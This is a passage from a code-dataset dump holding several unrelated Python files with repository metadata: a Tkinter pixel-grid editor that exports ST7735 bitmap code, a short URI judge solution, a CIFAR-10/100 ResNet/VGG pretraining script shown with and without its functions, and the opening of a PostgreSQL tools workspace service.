'gray1', 'gray2', 'gray3', 'gray4', 'gray5', 'gray6', 'gray7', 'gray8', 'gray9', 'gray10', 'gray11',
'gray12', 'gray13', 'gray14', 'gray15', 'gray16', 'gray17', 'gray18', 'gray19', 'gray20', 'gray21',
'gray22', 'gray23', 'gray24', 'gray25', 'gray26', 'gray27', 'gray28', 'gray29', 'gray30', 'gray31',
'gray32', 'gray33', 'gray34', 'gray35', 'gray36', 'gray37', 'gray38', 'gray39', 'gray40', 'gray42',
'gray43', 'gray44', 'gray45', 'gray46', 'gray47', 'gray48', 'gray49', 'gray50', 'gray51', 'gray52',
'gray53', 'gray54', 'gray55', 'gray56', 'gray57', 'gray58', 'gray59', 'gray60', 'gray61', 'gray62',
'gray63', 'gray64', 'gray65', 'gray66', 'gray67', 'gray68', 'gray69', 'gray70', 'gray71', 'gray72',
'gray73', 'gray74', 'gray75', 'gray76', 'gray77', 'gray78', 'gray79', 'gray80', 'gray81', 'gray82',
'gray83', 'gray84', 'gray85', 'gray86', 'gray87', 'gray88', 'gray89', 'gray90', 'gray91', 'gray92',
'gray93', 'gray94', 'gray95', 'gray97', 'gray98', 'gray99']
def __init__(self, master):
self.fillbutton = "0"
menu = Menu(master)
master.config(menu=menu)
bFrame = Frame(master)
subMenu = Menu(menu, tearoff=0)
menu.add_cascade(label="File", menu=subMenu)
topPadding = Frame(master, width=self.toolbarw, height=self.toolbarh)
subMenu.add_command(label="New File", command=partial(self.importpic, bFrame, topPadding))
subMenu.add_command(label="Placeholder", command=self.doNothing)
subMenu.add_separator()
subMenu.add_command(label="Placeholder", command=self.doNothing)
editMenu = Menu(menu, tearoff=0)
menu.add_cascade(label="Edit", menu=editMenu)
editMenu.add_command(label="Remove Row", command=partial(self.removeRow, bFrame, topPadding))
editMenu.add_command(label="Remove Col", command=partial(self.removeCol, bFrame, topPadding))
viewMenu = Menu(menu, tearoff=0)
menu.add_cascade(label="View", menu=viewMenu)
viewMenu.add_command(label="Color Chart", command=self.viewColorChart)
toolbar = Frame(master, width=self.toolbarw, height=20, bg="grey")
frameSep = Frame(master, width=self.toolbarw, height=3, bg="black")
bottomPadding = Frame(master, width=self.toolbarw, height=40)
self.setfillbutton = Checkbutton(bottomPadding, text="Fill")
self.setfillbutton.config(state=DISABLED)
self.setfillbutton.pack(side=LEFT)
colorselect = Button(toolbar, text="Set Color", command=partial(self.colorfillask, bFrame, topPadding))
colorselect.pack(side=LEFT)
gridSelect = Button(toolbar, text="Grid Select", command=partial(self.changeGrid, bFrame, topPadding))
gridSelect.pack(side=LEFT)
View = Button(toolbar, text="View", command=partial(self.viewImage, 40))
View.pack(side=LEFT)
baseCol = Button(toolbar, text="Color Fill", command=partial(self.fillColor, bFrame, topPadding))
baseCol.pack(side=LEFT)
exportbut = Button(toolbar, text="Export", command=self.expFunc)
exportbut.pack(side=LEFT)
self.buttons = []
for i in range(self.griddim):
self.buttons.append(Button(bFrame, width=self.buttonw, height=self.buttonh, bg=self.basecolor,
command=partial(self.buttonColor, i, bFrame, topPadding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
self.colors.append(self.basecolor)
toolbar.pack_propagate(0)
toolbar.pack(side=TOP)
frameSep.pack(side=TOP)
topPadding.pack(side=TOP)
bFrame.pack()
bottomPadding.pack(side=BOTTOM)
def doNothing(self):
print("Nope")
def buttonColor(self, position, frame, padding):
if self.colorfillvar == 0:
colorask = Frame(padding)
label_1 = Label(colorask, text="What Color?")
entry_1 = Entry(colorask)
label_2 = Label(colorask, text="Input takes lower case standard color, \nor #xxxxxxxxx hexadecimal number ")
buttonOK = Button(colorask, text="OK",
command=partial(self.getEntry, entry_1, position, frame, colorask, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, columnspan=2)
buttonOK.grid(row=2, columnspan=2)
colorask.pack()
else:
self.buttons[position].grid_forget()
try:
temp = Button(frame, width=self.buttonw, height=self.buttonh, bg=self.fillbutton,
command=partial(self.buttonColor, position, frame, padding))
except:
self.buttons[position] = Button(frame, width=self.buttonw, height=self.buttonh, bg='red',
command=partial(self.buttonColor, position, frame, padding))
self.buttons[position].grid(row=int(position / self.gridwidth), column=int(position % self.gridwidth))
self.colors[position] = "red"
print("Color entered is not recognized by tkinter. Please format the color as either a recognized tkinter string or #RGB or #RRGGBB or #RRRGGGBBB or #RRRRGGGGBBBB")
return
self.buttons[position] = Button(frame, width=self.buttonw, height=self.buttonh, bg=self.fillbutton,
command=partial(self.buttonColor, position, frame, padding))
self.buttons[position].grid(row=int(position / self.gridwidth), column=int(position % self.gridwidth))
self.colors[position] = self.fillbutton
def getEntry(self, entry, position, frame, colorask, padding):
self.colorentry = entry.get()
padding.config(width=self.toolbarw, height=self.toolbarh)
colorask.destroy()
if self.colorfillvar == 0:
self.buttons[position].grid_forget()
try:
temp = Button(frame, width=self.buttonw, height=self.buttonh, bg=self.colorentry,
command=partial(self.buttonColor, position, frame, padding))
except:
self.buttons[position] = Button(frame, width=self.buttonw, height=self.buttonh, bg='red',
command=partial(self.buttonColor, position, frame, padding))
self.buttons[position].grid(row=int(position / self.gridwidth), column=int(position % self.gridwidth))
self.colors[position] = "red"
print("Something went wrong")
return
self.buttons[position] = Button(frame, width=self.buttonw, height=self.buttonh, bg=self.colorentry,
command=partial(self.buttonColor, position, frame, padding))
self.buttons[position].grid(row=int(position / self.gridwidth), column=int(position % self.gridwidth))
self.colors[position] = self.colorentry
else:
self.fillbutton = self.colorentry
def getButtonColor(self, button):
rgb = button.winfo_rgb(button.cget('bg'))
r = (rgb[0] >> 11)
g = (rgb[1] >> 10)
g = g << 5
b = rgb[2] >> 11
b = b << 11
rgb = b + g + r
return '0x%04x' % (rgb)
def colorfillask(self, frame, padding):
colorask = Frame(padding)
label_1 = Label(colorask, text="What Color?")
entry_1 = Entry(colorask)
label_2 = Label(colorask, text="Input takes lower case standard color, \nor #xxxxxxxxx hexadecimal number ")
container = Frame(colorask)
buttonOK = Button(container, text="OK", command=partial(self.getEntry, entry_1, 1, frame, colorask, padding))
buttonSet = Button(container, text="Set", command=self.setfillvar)
buttonClear = Button(container, text="Clear", command=self.clearfillvar)
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, columnspan=2)
buttonOK.grid(row=1, column=1)
buttonSet.grid(row=1, column=2)
buttonClear.grid(row=1, column=3)
container.grid(row=2, columnspan=2)
colorask.pack()
def setfillvar(self):
self.setfillbutton.select()
self.colorfillvar = 1
def clearfillvar(self):
self.setfillbutton.deselect()
self.colorfillvar = 0
def changeGrid(self, frame, padding):
gridask = Frame(padding)
label_1 = Label(gridask, text="Grid Width:")
entry_1 = Entry(gridask)
label_2 = Label(gridask, text="Grid Height")
entry_2 = Entry(gridask)
buttonOK = Button(gridask, text="OK",
command=partial(self.getgridEntries, entry_1, entry_2, gridask, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, column=0)
entry_2.grid(row=1, column=1)
buttonOK.grid(row=2, columnspan=2)
gridask.pack()
def getgridEntries(self, entry1, entry2, kill, frame, padding):
if entry1.get() == "":
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
if entry2 != 1:
try:
temp1 = int(entry1.get())
temp2 = int(entry2.get())
except:
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
if int(entry1.get()) >30 or int(entry2.get()) >30:
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
self.gridwidth = int(entry1.get())
self.gridheight = int(entry2.get())
else:
if entry1.get() in self.COLORS:
self.basecolor = entry1.get()
else:
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
for i in range(self.griddim):
self.buttons[i].grid_forget()
self.griddim = self.gridwidth * self.gridheight
self.colors = []
self.buttons = []
for i in range(self.griddim):
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=self.basecolor,
command=partial(self.buttonColor, i, frame, padding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
self.colors.append(self.basecolor)
frame.pack()
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
def viewImage(self, size):
pixelI = Tk()
canvas = Canvas(pixelI, width=self.gridwidth * size, height=self.gridheight * size)
canvas.pack()
for i in range(self.gridheight):
for j in range(self.gridwidth):
canvas.create_rectangle(j * size, i * size, j * size + size, i * size + size,
fill=self.colors[i * self.gridwidth + j], width=0)
def fillColor(self, frame, padding):
fillAsk = Frame(padding)
label_1 = Label(fillAsk, text="What Color?")
entry_1 = Entry(fillAsk)
label_2 = Label(fillAsk, text="Input takes lower case standard color, \nor #xxxxxxxxx hexadecimal number ")
buttonOK = Button(fillAsk, text="OK", command=partial(self.getgridEntries, entry_1, 1, fillAsk, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, columnspan=2)
buttonOK.grid(row=2, columnspan=2)
fillAsk.pack()
def expFunc(self):
print('writing file')
file = open("bitmap.txt", "w")
file.write(
"uint16_t bitmap[] = {" + ','.join([self.getButtonColor(button) for button in self.buttons]) + "};\n\n")
file.write("int idx = 0;\nfor (int i=0; i< " + str(self.gridheight) + "; i++){\n" + "\tfor (int j=0; j< " + str(
self.gridwidth) +
"; j++){\n\t\tST7735_DrawPixel(j,i,bitmap[idx]);\n\t\tidx++;\n\t}\n}")
file.close()
def importpic(self, frame, padding):
resizeask = Frame(padding)
label_1 = Label(resizeask, text="Picture Name:")
entry_1 = Entry(resizeask)
label_2 = Label(resizeask, text="Resize Width")
entry_2 = Entry(resizeask)
label_3 = Label(resizeask, text="Resize Height")
entry_3 = Entry(resizeask)
buttonOK = Button(resizeask, text="OK",
command=partial(self.resizeandplace, entry_1, entry_2, entry_3, resizeask, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
label_2.grid(row=1, column=0)
entry_2.grid(row=1, column=1)
label_3.grid(row=2, column=0)
entry_3.grid(row=2, column=1)
buttonOK.grid(row=3, columnspan=2)
resizeask.pack()
def resizeandplace(self, entry1, entry2, entry3, kill, frame, padding):
if entry1.get() == "" or entry2.get() == "" or entry3.get() == "":
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
self.picname = entry1.get()
print(self.picname)
try:
im = Image.open(self.picname)
except:
kill.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
for i in range(self.griddim):
self.buttons[i].grid_forget()
temp1 = self.griddim
temp2 = self.gridwidth
temp3 = self.griddim
self.gridwidth = int(entry2.get())
self.gridheight = int(entry3.get())
self.griddim = self.gridheight * self.gridwidth
im = Image.open(self.picname)
im = im.resize((self.gridwidth, self.gridheight), Image.NEAREST)
pix = im.convert('RGB')
self.colors = []
self.buttons = []
for i in range(self.griddim):
r, g, b = pix.getpixel((int(i % self.gridwidth), int(i / self.gridwidth)))
# print(int(i%self.gridheight), int(i/self.gridheight))
# print(r,g,b)
rgb = (r << 16) + (g << 8) + b
rgb = "#%0.6x" % rgb
# print(rgb)
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=rgb,
command=partial(self.buttonColor, i, frame, padding)))
if self.gridwidth < 55 or self.gridheight < 30:
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
self.colors.append(rgb)
print("Check")
if self.gridwidth > 55 or self.gridheight > 30:
print("did it work?")
self.expFunc()
self.viewImage(4)
self.griddim = temp1
self.gridwidth = temp2
self.gridheight = temp3
buttons = []
for i in range(self.griddim):
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=self.basecolor,
command=partial(self.buttonColor, i, frame, padding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
self.colors.append(self.basecolor)
frame.pack()
else:
frame.pack()
kill.destroy()
im.save('resized_image.png')
padding.config(width=self.toolbarw, height=self.toolbarh)
def viewColorChart(self):
MAX_ROWS = 36
FONT_SIZE = 10 # (pixels)
ColorChart = Tk()
ColorChart.title("Named colour chart")
row = 0
col = 0
for color in self.COLORS:
e = Label(ColorChart, text=color, background=color,
font=(None, -FONT_SIZE))
e.grid(row=row, column=col, sticky=E + W)
row += 1
if (row > 36):
row = 0
col += 1
def removeRow(self, frame, padding):
gridask = Frame(padding)
label_1 = Label(gridask, text="Row: ")
entry_1 = Entry(gridask)
buttonOK = Button(gridask, text="OK",
command=partial(self.manMatRow, entry_1, gridask, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
buttonOK.grid(row=1, columnspan=2)
gridask.pack()
def removeCol(self, frame, padding):
gridask = Frame(padding)
label_1 = Label(gridask, text="Column: ")
entry_1 = Entry(gridask)
buttonOK = Button(gridask, text="OK",
command=partial(self.manMatCol, entry_1, gridask, frame, padding))
label_1.grid(row=0, sticky=E)
entry_1.grid(row=0, column=1)
buttonOK.grid(row=1, columnspan=2)
gridask.pack()
def manMatRow(self, entry_1, gridask, frame, padding):
try:
temp1 = int(entry_1.get())
except:
print("Value given failed integer conversion")
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
if int(entry_1.get()) <=0 or int(entry_1.get()) >self.gridheight:
print("Integer given is out of bounds")
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
rowID = int(entry_1.get())-1
for i in range(self.griddim):
self.buttons[i].grid_forget()
self.buttons = []
for i in range(self.gridwidth):
del self.colors[self.gridwidth*rowID]
print(i)
self.gridheight = self.gridheight - 1
self.griddim = self.gridheight*self.gridwidth
for i in range(self.griddim):
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=self.colors[i],
command=partial(self.buttonColor, i, frame, padding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
frame.pack()
def manMatCol(self, entry_1, gridask, frame, padding):
try:
temp1 = int(entry_1.get())
except:
print("Value given failed integer conversion")
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
if int(entry_1.get()) <=0 or int(entry_1.get()) >self.gridwidth:
print("Integer given is out of bounds")
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
return
colID = int(entry_1.get())-1
for i in range(self.griddim):
self.buttons[i].grid_forget()
self.buttons = []
temp = []
j=0
for i in range(self.griddim):
if (i%self.gridwidth == colID):
continue
else:
temp.append(self.colors[i])
j=j+1
self.colors = temp
self.gridwidth = self.gridwidth - 1
self.griddim = self.gridheight*self.gridwidth
for i in range(self.griddim):
self.buttons.append(Button(frame, width=self.buttonw, height=self.buttonh, bg=self.colors[i],
command=partial(self.buttonColor, i, frame, padding)))
self.buttons[i].grid(row=int((i / self.gridwidth)), column=int((i % self.gridwidth)))
gridask.destroy()
padding.config(width=self.toolbarw, height=self.toolbarh)
frame.pack()
root = Tk()
z = mainclass(root)
root.mainloop()
sys.exit()
| 18,808
| 8,280
| 24
|
5b5b793fca0e9766cab8b5858b8f208bb7985336
| 99
|
py
|
Python
|
3088.py
|
heltonricardo/URI
|
160cca22d94aa667177c9ebf2a1c9864c5e55b41
|
[
"MIT"
] | 6
|
2021-04-13T00:33:43.000Z
|
2022-02-10T10:23:59.000Z
|
3088.py
|
heltonricardo/URI
|
160cca22d94aa667177c9ebf2a1c9864c5e55b41
|
[
"MIT"
] | null | null | null |
3088.py
|
heltonricardo/URI
|
160cca22d94aa667177c9ebf2a1c9864c5e55b41
|
[
"MIT"
] | 3
|
2021-03-23T18:42:24.000Z
|
2022-02-10T10:24:07.000Z
|
while True:
try: e = input()
except: break
print(e.replace(' .', '.').replace(' ,', ','))
| 19.8
| 49
| 0.494949
|
while True:
try: e = input()
except: break
print(e.replace(' .', '.').replace(' ,', ','))
| 0
| 0
| 0
|
ab980aaa6de7f8762e60114a8a45d13eb831478f
| 5,985
|
py
|
Python
|
Unlearning/pretrain.py
|
cleverhans-lab/unrolling-sgd
|
49e001f9cc77b61d65eac3bf26888b5183b73bef
|
[
"MIT"
] | 3
|
2022-03-21T13:16:56.000Z
|
2022-03-22T07:55:10.000Z
|
Unlearning/pretrain.py
|
cleverhans-lab/unrolling-sgd
|
49e001f9cc77b61d65eac3bf26888b5183b73bef
|
[
"MIT"
] | null | null | null |
Unlearning/pretrain.py
|
cleverhans-lab/unrolling-sgd
|
49e001f9cc77b61d65eac3bf26888b5183b73bef
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
from ResNet_CIFAR10 import *
from VGG_model import *
#####################################################################
################### Some Loss functions things ######################
#####################################################################
parser = argparse.ArgumentParser(description='Pre-training CIFAR10 Models')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--model', default='resnet', type=str, help='resnet or vgg')
parser.add_argument('--loss_func', default='regular', type=str, help='loss function: regular,hessian, hessianv2, std_loss')
parser.add_argument('--dataset', default = 'cifar10', type=str, help ='cifar10, cifar100')
parser.add_argument('--batch_size', default=128, type=int, help='batch size')
parser.add_argument('--epochs', default=10, type=int, help='epochs')
parser.add_argument('--std_reg', default = 0.1, type = float, help= 'regularization for std loss')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
std_reg = args.std_reg
print(f'Model = {args.model} dataset = {args.dataset} loss = {args.loss_func} std lambda = {args.std_reg}')
print('==> Preparing data..')
if args.dataset == 'cifar10':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)
num_classes = 10
if args.dataset == 'cifar100':
transform_train = transforms.Compose([
#transforms.ToPILImage(),
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(15),
transforms.ToTensor(),
transforms.Normalize( (0.5070751592371323, 0.48654887331495095, 0.4409178433670343), (0.2673342858792401, 0.2564384629170883, 0.27615047132568404))
])
#cifar100_training = CIFAR100Train(path, transform=transform_train)
cifar100_training = torchvision.datasets.CIFAR100(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(cifar100_training, shuffle=True, num_workers=2, batch_size=args.batch_size)
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5070751592371323, 0.48654887331495095, 0.4409178433670343), (0.2673342858792401, 0.2564384629170883, 0.27615047132568404))])
cifar100_test = torchvision.datasets.CIFAR100(root='./data', train=False, download=True, transform=transform_test)
testloader= torch.utils.data.DataLoader(cifar100_test, shuffle=True, num_workers=2, batch_size=args.batch_size)
num_classes = 100
print('==> Building model..')
if args.model == 'resnet':
net = ResNet18(num_classes)
if args.model == 'vgg':
net = VGG('VGG19',num_classes)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr, weight_decay=5e-4)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=200)
for epoch in range(0, args.epochs):
train(epoch)
scheduler.step()
test(epoch)
acc =test(0)
print('Saving..')
state = {
'net': net.state_dict(),
'acc': acc,
'epoch': args.epochs,
'batch size': args.batch_size,
}
if not os.path.isdir('Final_pretrained_models'):
os.mkdir('Final_pretrained_models')
torch.save(state, f'./Final_pretrained_models/{args.model}_{args.dataset}_{args.loss_func}_{args.batch_size}_{args.epochs}.pth')
| 40.167785
| 156
| 0.661988
|
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
from ResNet_CIFAR10 import *
from VGG_model import *
#####################################################################
################### Some Loss functions things ######################
#####################################################################
def std_loss(x,y):
log_prob = -1.0 * F.log_softmax(x, 1)
loss = log_prob.gather(1, y.unsqueeze(1))
loss = loss.mean()
avg_std = torch.sum(torch.std(x, dim=1))/(len(x.view(-1)))
loss = loss + std_reg*avg_std
return loss
parser = argparse.ArgumentParser(description='Pre-training CIFAR10 Models')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--model', default='resnet', type=str, help='resnet or vgg')
parser.add_argument('--loss_func', default='regular', type=str, help='loss function: regular,hessian, hessianv2, std_loss')
parser.add_argument('--dataset', default = 'cifar10', type=str, help ='cifar10, cifar100')
parser.add_argument('--batch_size', default=128, type=int, help='batch size')
parser.add_argument('--epochs', default=10, type=int, help='epochs')
parser.add_argument('--std_reg', default = 0.1, type = float, help= 'regularization for std loss')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
std_reg = args.std_reg
print(f'Model = {args.model} dataset = {args.dataset} loss = {args.loss_func} std lambda = {args.std_reg}')
print('==> Preparing data..')
if args.dataset == 'cifar10':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)
num_classes = 10
if args.dataset == 'cifar100':
transform_train = transforms.Compose([
#transforms.ToPILImage(),
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(15),
transforms.ToTensor(),
transforms.Normalize( (0.5070751592371323, 0.48654887331495095, 0.4409178433670343), (0.2673342858792401, 0.2564384629170883, 0.27615047132568404))
])
#cifar100_training = CIFAR100Train(path, transform=transform_train)
cifar100_training = torchvision.datasets.CIFAR100(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(cifar100_training, shuffle=True, num_workers=2, batch_size=args.batch_size)
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5070751592371323, 0.48654887331495095, 0.4409178433670343), (0.2673342858792401, 0.2564384629170883, 0.27615047132568404))])
cifar100_test = torchvision.datasets.CIFAR100(root='./data', train=False, download=True, transform=transform_test)
testloader= torch.utils.data.DataLoader(cifar100_test, shuffle=True, num_workers=2, batch_size=args.batch_size)
num_classes = 100
print('==> Building model..')
if args.model == 'resnet':
net = ResNet18(num_classes)
if args.model == 'vgg':
net = VGG('VGG19',num_classes)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr, weight_decay=5e-4)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=200)
def train(epoch):
print('Epoch: %d' % epoch)
net.train()
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
outputs = net(inputs)
if args.loss_func == 'std':
loss = std_loss(outputs,targets)
if args.loss_func =='regular':
loss = criterion(outputs,targets)
loss.backward()
optimizer.step()
def test(epoch):
net.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = net(inputs)
if args.loss_func == 'std':
loss = std_loss(outputs,targets)
if args.loss_func =='regular':
loss = criterion(outputs,targets)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
print('testing Accuracy: %.3f%% (%d/%d)' %(100.*correct/total, correct, total))
acc = 100.*correct/total
return acc
for epoch in range(0, args.epochs):
train(epoch)
scheduler.step()
test(epoch)
acc =test(0)
print('Saving..')
state = {
'net': net.state_dict(),
'acc': acc,
'epoch': args.epochs,
'batch size': args.batch_size,
}
if not os.path.isdir('Final_pretrained_models'):
os.mkdir('Final_pretrained_models')
torch.save(state, f'./Final_pretrained_models/{args.model}_{args.dataset}_{args.loss_func}_{args.batch_size}_{args.epochs}.pth')
| 1,412
| 0
| 68
|
3687dfbc45547dd943f334c95d56f3afef1bae2d
| 8,256
|
py
|
Python
|
pgsqltoolsservice/workspace/workspace_service.py
|
sergb213/pgtoolsservice
|
6296a207e7443fe4ebd5c91d837c033ee7886cab
|
[
"MIT"
] | null | null | null |
pgsqltoolsservice/workspace/workspace_service.py
|
sergb213/pgtoolsservice
|
6296a207e7443fe4ebd5c91d837c033ee7886cab
|
[
"MIT"
] | null | null | null |
pgsqltoolsservice/workspace/workspace_service.py
|
sergb213/pgtoolsservice
|
6296a207e7443fe4ebd5c91d837c033ee7886cab
|
[
"MIT"
] | 1
|
2020-07-30T11:46:44.000Z
|
2020-07-30T11:46:44.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from logging import Logger # noqa
from typing import Callable, List, Optional # noqa
from pgsqltoolsservice.hosting import JSONRPCServer, NotificationContext, ServiceProvider # noqa
from pgsqltoolsservice.workspace.contracts import (
DID_CHANGE_CONFIG_NOTIFICATION, DidChangeConfigurationParams,
DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION, DidChangeTextDocumentParams,
DID_OPEN_TEXT_DOCUMENT_NOTIFICATION, DidOpenTextDocumentParams,
DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION, DidCloseTextDocumentParams,
Configuration, Range
)
from pgsqltoolsservice.workspace.script_file import ScriptFile
from pgsqltoolsservice.workspace.workspace import Workspace
class WorkspaceService:
"""
Class for handling requests/events that deal with the sate of the workspace including opening
and closing of files, the changing of configuration, etc.
"""
# PROPERTIES ###########################################################
@property
@property
def workspace(self) -> Workspace:
"""Gets the current workspace"""
return self._workspace
# METHODS ##############################################################
def get_text(self, file_uri: str, selection_range: Optional[Range]) -> str:
"""
Get the requested text selection, as a string, for a document
:param file_uri: The URI of the requested file
:param selection_data: An object containing information about which part of the file to return,
or None for the whole file
:raises ValueError: If there is no file matching the given URI
"""
open_file = self._workspace.get_file(file_uri)
if open_file is None:
raise ValueError('No file corresponding to the given URI')
if selection_range is None:
return open_file.get_all_text()
else:
return open_file.get_text_in_range(selection_range)
# REQUEST HANDLERS #####################################################
def _handle_did_change_config(
self,
notification_context: NotificationContext,
params: DidChangeConfigurationParams
) -> None:
"""
Handles the configuration change event by storing the new configuration and calling all
registered config change callbacks
:param notification_context: Context of the notification
:param params: Parameters from the notification
"""
self._configuration = params.settings
for callback in self._config_change_callbacks:
callback(self._configuration)
def _handle_did_change_text_doc(
self,
notification_context: NotificationContext,
params: DidChangeTextDocumentParams
) -> None:
"""
Handles text document change notifications
:param notification_context: Context of the notification
:param params: Parameters of the notification
"""
try:
# Skip processing if the file isn't opened
script_file: ScriptFile = self._workspace.get_file(params.text_document.uri)
if script_file is None:
return
# Apply the changes to the document
for text_change in params.content_changes:
script_file.apply_change(text_change)
# Propagate the changes to the registered callbacks
for callback in self._text_change_callbacks:
callback(script_file)
except Exception as e:
if self._logger is not None:
self._logger.exception(f'Exception caught during text doc change: {e}')
def _handle_did_open_text_doc(
self,
notification_context: NotificationContext,
params: DidOpenTextDocumentParams
) -> None:
"""
Handles when a file is opened in the workspace. The event is propagated to the registered
file open callbacks
:param notification_context: Context of the notification
:param params: Parameters from the notification
"""
try:
# Open a new ScriptFile with the initial buffer provided
opened_file: ScriptFile = self._workspace.open_file(params.text_document.uri, params.text_document.text)
if opened_file is None:
return
# Propagate the notification to the registered callbacks
for callback in self._text_open_callbacks:
callback(opened_file)
except Exception as e:
if self._logger is not None:
self._logger.exception(f'Exception caught during text doc open: {e}')
def _handle_did_close_text_doc(
self,
notification_context: NotificationContext,
params: DidCloseTextDocumentParams
) -> None:
"""
Handles when a file is closed in the workspace. The event is propagated to the registered
file close callbacks
:param notification_context: Context of the notification
:param params: Parameters from the notification
"""
try:
# Attempt to close the requested file
closed_file: ScriptFile = self._workspace.close_file(params.text_document.uri)
if closed_file is None:
return
# Propagate the notification to the registered callbacks
for callback in self._text_close_callbacks:
callback(closed_file)
except Exception as e:
if self._logger is not None:
self._logger.exception(f'Exception caught during text doc close: {e}')
| 44.149733
| 118
| 0.652737
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from logging import Logger # noqa
from typing import Callable, List, Optional # noqa
from pgsqltoolsservice.hosting import JSONRPCServer, NotificationContext, ServiceProvider # noqa
from pgsqltoolsservice.workspace.contracts import (
DID_CHANGE_CONFIG_NOTIFICATION, DidChangeConfigurationParams,
DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION, DidChangeTextDocumentParams,
